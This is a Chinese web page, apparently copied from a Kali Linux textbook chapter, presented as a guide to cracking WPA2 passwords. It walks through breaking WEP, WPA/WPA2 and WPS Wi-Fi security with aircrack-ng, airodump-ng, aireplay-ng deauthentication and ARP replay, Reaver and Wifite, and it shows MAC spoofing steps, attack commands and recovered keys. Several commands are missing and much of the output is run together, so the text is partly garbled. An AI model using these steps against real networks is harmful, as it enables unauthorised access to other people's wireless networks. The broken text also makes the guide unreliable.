wpa2密码破解软件(如何破解软件密码呢)深度揭秘

2.1 破解WEP加密的无线网络。Wired Equivalent Privacy或WEP协议是对在两台设备间无线传输的数据进行加密的方式，用以

 

Aircrack-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具该工具主要用了两种攻击方式进行WEP破解一种是FMS攻击，该攻击方式是以发现该WEP漏洞的研究人员名字（Scott Fluhrer、Itsik Mantin及Adi Shamir）所命名；另一种是Korek攻击，该攻击方式是通过统计进行攻击的，并且该攻击的效率要远高于FMS攻击。

本节将介绍使用Aircrack-ng破解无线网络9.2.1 破解WEP加密的无线网络Wired Equivalent Privacy或WEP（有线等效加密）协议是对在两台设备间无线传输的数据进行加密的方式，用以防止非法用户窃听或侵入无线网络。

不过密码分析学家已经找出WEP好几个弱点，因此在2003年被Wi-Fi Protected Access（WPA）淘汰，又在2004年由完整的IEEE 802.11i标准（又称为WPA2）所取代本小节将介绍破解WEP加密的无线网络。

使用Aircrack破解使用WEP加密的无线网络。具体操作步骤如下所示。（1）使用airmon-ng命令查看当前系统中的无线网络接口。执行命令如下所示：

输出的信息表示，当前系统中存在一个无线网络接口从输出结果的Interface列，可以看到当前系统的无线接口为wlan0（2）修改wlan0接口的MAC地址因为MAC地址标识主机所在的网络，修改主机的MAC地址可以隐藏真实的MAC地址。

在修改MAC地址之前，需要停止该接口执行命令如下所示：

或者：root@kali:~# ifconfig wlan0 down执行以上命令后，wlan0接口则停止此时就可以修改MAC地址了，执行命令如下 所示：root@kali:~# macchanger--mac

00:11:22:33:44:55wlan0PermanentMAC: 00:c1:40:76:05:6c (unknown) CurrentMAC: 00:c1:40:76:05:6c (unknown)

NewMAC: 00:11:22:33:44:55 (Cimsys Inc) 输出的信息显示了wlan0接口永久的MAC地址、当前的MAC地址及新的MAC地址可以看到wlan1接口的MAC地址已经被修改。

（3）重新启动wlan0。执行命令如下所示：

输出的信息显示了无线网卡wlan0的芯片及驱动类型例如，当前系统的无线网卡芯片为Ralink RT2870/3070；默认驱动为rt2800usb，并显示监听模式被启用，映射网络接口为mon0有时候使用airmon-ng start wlan0命令启用无线网卡时，可能会出现SIOCSIFFLAGS: Operation not possible due to RF-kill错误。

这是因为Linux下有一个软件RF-kill，该软件为了省电会将不使用的无线设备（如WIFI和Buletooth）自动关闭当用户使用这些设备时，RF-kill不会智能的自动打开，需要手动解锁用户可以执行rfkill list命令查看所有设备，如下所示：。

root@kali:~#rfkilllist0: ideapad_wlan:WirelessLANSoft blocked:yesHard blocked:no1: phy0:WirelessLANSoft blocked:

yesHard blocked:no该列表中前面的编号，表示的是设备的索引号用户可以通过指定索引号，停止或启用某个设备如启用所有设备，执行如下所示的命令：root@kali:~# rfkill unblock all。

执行以上命令后，没有任何信息输出。以上命令表示，解除所有被关闭的设备。（4）使用airodump命令定位附近所有可用的无线网络。执行命令如下所示：

以上输出的信息显示了附近所有可用的无线网络当找到用户想要攻击的无线路由器时，按下Ctrl+C键停止搜索从输出的信息中看到有很多参数详细介绍如下所示BSSID：无线的IP地址PWR：网卡报告的信号水平Beacons：无线发出的通告编号。

Data：被捕获到的数据分组的数量，包括广播分组/s：过去10秒钟内每秒捕获数据分组的数量CH：信道号（从Beacons中获取）MB：无线所支持的最大速率如果MB=11，它是802.11b；如果MB=22，它是802.11b+；如果更高就是802.11g。

后面的点（高于54之后）表明支持短前导码ENC：使用的加密算法体系OPN表示无加密WEP？表示WEP或者WPA/WPA2模式，WEP（没有问号）表示静态或动态WEP如果出现TKIP或CCMP，那么就是WPA/WPA2。

CIPHER：检测到的加密算法，是CCMP、WRAAP、TKIP、WEP和WEP104中的一个典型的来说（不一定），TKIP与WPA结合使用，CCMP与WPA2结合使用如果密钥索引值大于0，显示为WEP40。

标准情况下，索引0-3是40bit，104bit应该是0AUTH：使用的认证协议常用的有MGT（WPA/WPA2使用独立的认证服务器，平时我们常说的802.1x、radius和eap等）、SKA（WEP的共享密钥）、PSK（WPA/WPA2的预共享密钥）或者OPN（WEP开放式）。

ESSID：指所谓的SSID号如果启用隐藏的SSID的话，它可以为空这种情况下，airodump-ng试图从proberesponses和associationrequests中获取SSIDSTATION：客户端的MAC地址，包括连上的和想要搜索无线来连接的客户端。

如果客户端没有连接上，就在BSSID下显示“notassociated”Rate：表示传输率Lost：在过去10秒钟内丢失的数据分组，基于序列号检测它意味着从客户端来的数据丢包，每个非管理帧中都有一个序列号字段，把刚接收到的那个帧中的序列号和前一个帧中的序列号一减就能知道丢了几个包。

Frames：客户端发送的数据分组数量Probe：被客户端查探的ESSID如果客户端正试图连接一个无线，但是没有连接上，那么就显示在这里（5）使用airodump-ng捕获指定BSSID的文件执行命令如下所示。

airodump-ng命令常用的选项如下所示-c：指定选择的频道-w：指定一个文件名，用于保存捕获的数据-bssid：指定攻击的BSSID下面将Bssid为14:E6:E4:AC:FB:20的无线路由器作为攻击目标。

执行命令如下所示：

从输出的信息中可以看到ESSID为Test无线路由器的#Data一直在变化，表示有客户端正与无线发生数据交换以上命令执行成功后，会生成一个名为wirelessattack-01.ivs的文件，而不是wirelessattack.ivs。

这是因为airodump-ng工具为了方便后面破解的时候调用，所有对保存文件按顺序编了号，于是就多了-01这样的序号，以此类推在进行第二次攻击时，若使用同样文件名wirelessattack保存的话，就会生成名为wirelessattack-02.ivs文件。

（6）打开一个新的终端窗口，运行aireplay命令aireplay命令的语法格式如下所示：aireplay-ng-1 0 -a[BSSID]-h[our Chosen MAC address]-e[ESSID]

[Interface]aireplay-ng-dauth 1 -a[BSSID]-c[our Chosen MAC address][Interface]启动aireplay，执行命令如下所示：root@kali:~#

aireplay-ng-10-a14:E6:E4:AC:FB:20-h00:11:22:33:44:55-eTestmon0TheinterfaceMAC(00:C1:40:76:05:6C)doesnt

matchthespecifiedMAC(-h).ifconfigmon0hwether00:11:22:33:44:5517:25:17Waitingforbeaconframe(BSSID:14:E6:E4:AC:FB:20)

onchannel117:25:17SendingAuthenticationRequest(OpenSystem)[ACK]17:25:17Switchingtosharedkeyauthentication

17:25:19SendingAuthenticationRequest(SharedKey)[ACK]17:25:19Switchingtosharedkeyauthentication17:25:21

SendingAuthenticationRequest(SharedKey)[ACK]17:25:21Switchingtosharedkeyauthentication17:25:23Sending

AuthenticationRequest(SharedKey)[ACK]17:25:23Switchingtosharedkeyauthentication17:25:25SendingAuthentication

Request(SharedKey)[ACK]17:25:25Switchingtosharedkeyauthentication17:25:27SendingAuthenticationRequest

(SharedKey)[ACK]17:25:27Switchingtosharedkeyauthentication17:25:29SendingAuthenticationRequest(Shared

Key)[ACK]17:25:29Switchingtosharedkeyauthentication（7）使用aireplay发送一些流量给无线路由器，以至于能够捕获到数据语法格式如下所示：aireplay-ng。

3 -b[BSSID]-h[Our chosen MAC address][Interface]执行命令如下所示：root@kali:~#aireplay-ng-3-b14:E6:E4:AC:FB:20

-h00:11:22:33:44:55mon0TheinterfaceMAC(00:C1:40:76:05:6C)doesntmatchthespecifiedMAC(-h).ifconfigmon0hw

ether00:11:22:33:44:5517:26:54Waitingforbeaconframe(BSSID:14:E6:E4:AC:FB:20)onchannel1SavingARPrequests

inreplay_arp-0515-172654.capYoushouldalsostartairodump-ngtocapturereplies.Notice:gotadeauth/disassocpacket.

IsthesourceMACassociated?Read1259packets(got1ARPrequestsand189ACKs),sent198packets…(499ppsRead1547packets

(got1ARPrequestsand235ACKs),sent248packets…(499ppsRead1843packets(got1ARPrequestsand285ACKs),sent298packets…(499

ppsRead2150packets(got1ARPrequestsand333ACKs),sent348packets…(499ppsRead2446packets(got1ARPrequestsand

381ACKs),sent398packets…(499ppsRead2753packets(got1ARPrequestsand430ACKs),sent449packets…(500ppsRead3058

packets(got1ARPrequestsand476ACKs),sent499packets…(500ppsRead3367packets(got1ARPrequestsand525ACKs),sent

548packets…(499ppsRead3687packets(got1ARPrequestsand576ACKs),sent598packets…(499ppsRead4001packets(got

1ARPrequestsand626ACKs),sent649packets…(500ppsRead4312packets(got1ARPrequestsand674ACKs),sent699packets…(500

ppsRead4622packets(got1ARPrequestsand719ACKs),sent749packets…(500ppsRead4929packets(got1ARPrequestsand

768ACKs),sent798packets…(499ppsRead5239packets(got1ARPrequestsand817ACKs),sent848packets…(499pps输出的信息就是使用ARP Requests的方式来读取ARP请求报文的过程，此时回到airodump-ng界面查看，可以看到Test的Frames栏的数字在飞速的递增。

在抓取的无线数据报文达到了一定数量后，一般都是指IVsX值达到2万以上时，就可以开始破解，若不能成功就等待数据包文继续抓取，然后多尝试几次（8）使用Aircrack破解密码。执行命令如下所示：

从输出的结果中可以看到KEY FOUND，表示密码已经找到，为abcde9.2.2 破解WPA/WPA2无线网络WPA全名为Wi-Fi Protected Access，有WPA和WPA2两个标准它是一种保护无线电脑网络安全的协议。

对于启用WPA/WPA2加密的无线网络，其攻击和破解步骤及攻击是完全一样的不同的是，在使用airodump-ng进行无线探测的界面上，会提示为WPA CCMP PSK当使用aireplay-ng进行攻击后，同样获取到WPA握手数据包及提示；在破解时需要提供一个密码字典。

下面将介绍破解WPA/WPA2无线网络的方法使用aircrack-ng破解WPA/WPA2无线网络的具体操作步骤如下所示。（1）查看无线网络接口。执行命令如下所示：

（2）停止无线网络接口。执行命令如下所示：

（3）修改无线网卡MAC地址执行命令如下所示：root@kali:~# macchanger--mac00:11:22:33:44:55wlan0PermanentMAC: 00:c1:40:76:05。

:6c (unknown) CurrentMAC: 00:c1:40:76:05:6c (unknown) NewMAC: 00:11:22:33:44:55 (Cimsys Inc) （4）启用无线网络接口。

执行命令如下所示：

（5）捕获数据包。执行命令如下所示：

（6）对无线路由器Test进行Deauth攻击执行命令如下所示：root@kali:~# aireplay-ng--deauth1-a14:E6:E4:AC:FB:20-c00:11:22:33: 44

:55mon017:50:27Waitingforbeaconframe (BSSID: 14:E6:E4:AC:FB:20) onchannel117:50:30Sending64directedDeAuth

. STMAC: [00:11:22:33:44:55][12|59 ACKs]（7）破解密码。执行命令如下所示：

从输出的信息中可以看到无线路由器的密码已经成功破解在KEY FOUND提示的右侧可以看到密码已被破解出，为daxueba，破解速度约为500.88 k/s9.2.3 攻击WPS（Wi-Fi Proteced Setup）。

WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定标准该标准主要是为了解决无线网络加密认证设定的步骤过于繁杂的弊病因为通常用户往往会因为设置步骤太麻烦，以至于不做任何加密安全设定，从而引起许多安全上的问题。

所以很多人使用WPS设置无线设备，可以通过个人识别码（PIN）或按钮（PBC）取代输入一个很长的密码短语当开启该功能后，攻击者就可以使用暴力攻击的方法来攻击WPS本小节将介绍使用各种工具攻击WPS现在大部分路由器上都支持WPS功能。

以前路由器有专门的WPS设置，现在的路由器使用QSS功能取代了这里以TP-LINK型号为例，介绍设置WPS功能，如图9.15所示如果使用WPS的PBC方式，只需要按下路由器上的QSS/RESET按钮就可以了。

图9.15 设置WPS从该界面可以看到QSS功能已开启，可以看到当前的PIN码是04588306这里可以重新生成新的PIN码，或者恢复初始PIN码【实例9-1】使用Reaver破解WPS具体操作步骤如下所示。

（1）插入无线网卡，使用ifconfig命令查看无线网卡是否已经正确插入执行命令如下所示：root@Kali:~# ifconfigeth0Linkencap:EthernetHWaddr00:19:21

:3f:c3:e5inetaddr:192.168.5.4Bcast:192.168.5.255Mask:255.255.255.0inet6addr: fe80::219:21ff:fe3f:c3e5

/64Scope:LinkUPBROADCASTRUNNINGMULTICASTMTU:1500Metric:1RXpackets:10541errors:0dropped:0overruns:0frame

:0TXpackets:7160errors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:1000RXbytes:4205470 (4.0 MiB)

TXbytes:600691 (586.6 KiB) loLinkencap:LocalLoopbackinetaddr:127.0.0.1Mask:255.0.0.0inet6addr: ::1/128

Scope:HostUPLOOPBACKRUNNINGMTU:65536Metric:1RXpackets:296errors:0dropped:0overruns:0frame:0TXpackets:296

errors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:0RXbytes:17760 (17.3 KiB) TXbytes:17760 (17.3

KiB) 从输出的信息中可以看到，只有一个以太网接口eth0这是因为无线网卡可能没有启动，首先来启动该无线网卡执行命令如下所示：root@Kali:~# ifconfig wlan0 up执行以上命令后，没有任何信息输出。

此时再次执行ifconfig命令，查看无线网络是否已启动，如下所示：root@Kali:~# ifconfig ...... wlan0Linkencap:EthernetHWaddr08:10:76:49

:c3:cdUPBROADCASTMULTICASTMTU:1500Metric:1RXpackets:0errors:0dropped:0overruns:0frame:0TXpackets:0errors

:0dropped:0overruns:0carrier:0collisions:0txqueuelen:1000RXbytes:0 (0.0 B) TXbytes:0 (0.0 B) 看到以上输出信息，则表示无线网卡已成功启动，其网络接口为wlan0。

（2）启动无线网卡为监听模式。执行命令如下所示：

从输出的信息中，可以看到monitor mode enabled on mon0，表示无线网卡已启动监听模式在以上信息中，还可以看到无线网卡的芯片级驱动类型其中，该网卡的芯片为Ralink，默认驱动为rt2800usb。

注意：执行以上命令启动监听模式，一定要确定正确识别无线网卡的芯片和驱动否则，该无线网卡可能导致攻击失败（3）攻击WPS执行命令如下所示：root@kali:~#reaver-imon0-b14:E6:E4:AC:FB:20。

-vvReaverv1.4WiFiProtectedSetupAttackToolCopyright(c)2011,TacticalNetworkSolutions,CraigHeffner

tacnetsol.com>[+]Waitingforbeaconfrom14:E6:E4:AC:FB:20[+]Switchingmon0tochannel1[+]Switchingmon0tochannel

2[+]Switchingmon0tochannel3[+]Switchingmon0tochannel11[+]Switchingmon0tochannel4[+]Switchingmon0tochannel

5[+]Switchingmon0tochannel6[+]Switchingmon0tochannel7[+]Associatedwith8C:21:0A:44:09:F8(ESSID:yztxty)

[+]Tryingpin12345670[+]SendingEAPOLSTARTrequest[+]Receivedidentityrequest[+]Sendingidentityresponse[+]

Receivedidentityrequest[+]Sendingidentityresponse[+]ReceivedM1message[+]SendingM2message[+]ReceivedM3

message[+]SendingM4message[+]ReceivedWSCNACK[+]SendingWSCNACK......从以上输出信息中，可以看到正在等待连接到14:E6:E4:AC:FB:20无线路由器的信号。

并且通过发送PIN信息，获取密码如果没有路由器没有开启WPS的话，将会出现如下所示的信息：[!]WARNING: Failedtoassociatewith14:E6:E4:AC:FB:20 (ESSID

: XXXX) Fern WiFi Cracker是一个非常不错的工具，用来测试无线网络安全后面将会介绍使用该工具，攻击Wi-Fi网络这里首先介绍使用Fern WiFi Cracker工具来攻击WPS【实例9-2】使用Wifite攻击WPS。

具体操作步骤如下所示（1）启动Wifite工具，并指定使用common.txt密码字典在命令行终端执行如下所示的命令：root@kali:~# wifite -dict common.txt执行以上命令后，将显示如下所示的信息：。

以上信息显示了WiFite工具的版本信息，支持平台，并且开始扫描无线网络。当扫描到想要破解的无线网络时，按下CTRL+C组合键停止扫描。（2）停止扫描无线网络，将显示如下所示的信息：

从以上输出信息中，可以看到扫描到五个无线接入点和三个客户端在输出信息中，共显示了7列分别表示无线接入点编号、ESSID号、信道、加密方式、电功率、是否开启wps和客户端如果仅有一个客户端连接到无线接入点，则CLIENT列显示是client。

如果有多个客户端连接的话，则显示是clients（3）此时，选择要攻击的无线接入点这里选择第五个无线接入点，输入“1”然后按下回车键将开始攻击，显示信息如下所示：[+] select target numbers (。

1-5) separated by commas, orall: 1 [+] 1 target selected. [0:00:00] initializing WPS PIN attack on yzty (EC:

17:2F:46:70:BA) [0:11:00] WPS attack, 0/0success/ttl, [!] unable tocomplete successful try in660seconds

[+] skipping yzty [0:08:20] starting wpa handshake capture on"yzty" [0:08:11] newclientfound: 18:DC:

56:F0:62:AF [0:08:09] listening for handshake… [0:00:11] handshake captured! saved as"hs/yzty_EC-17-2F-46-70-BA.cap"

[+] 2 attacks completed: [+] 1/2 WPA attacks succeeded yzty (EC:17:2F:46:70:BA) handshake captured saved

as hs/yzty_EC-17-2F-46-70-BA.cap [+] starting WPA cracker on1 handshake [0:00:00] cracking yzty with

aircrack-ng [+] cracked yzty (EC:17:2F:46:70:BA)! [+] key: "huolong5" [+] quitting 从输出的信息中，可以看到破解出yzty无线设备的密码为huolong5。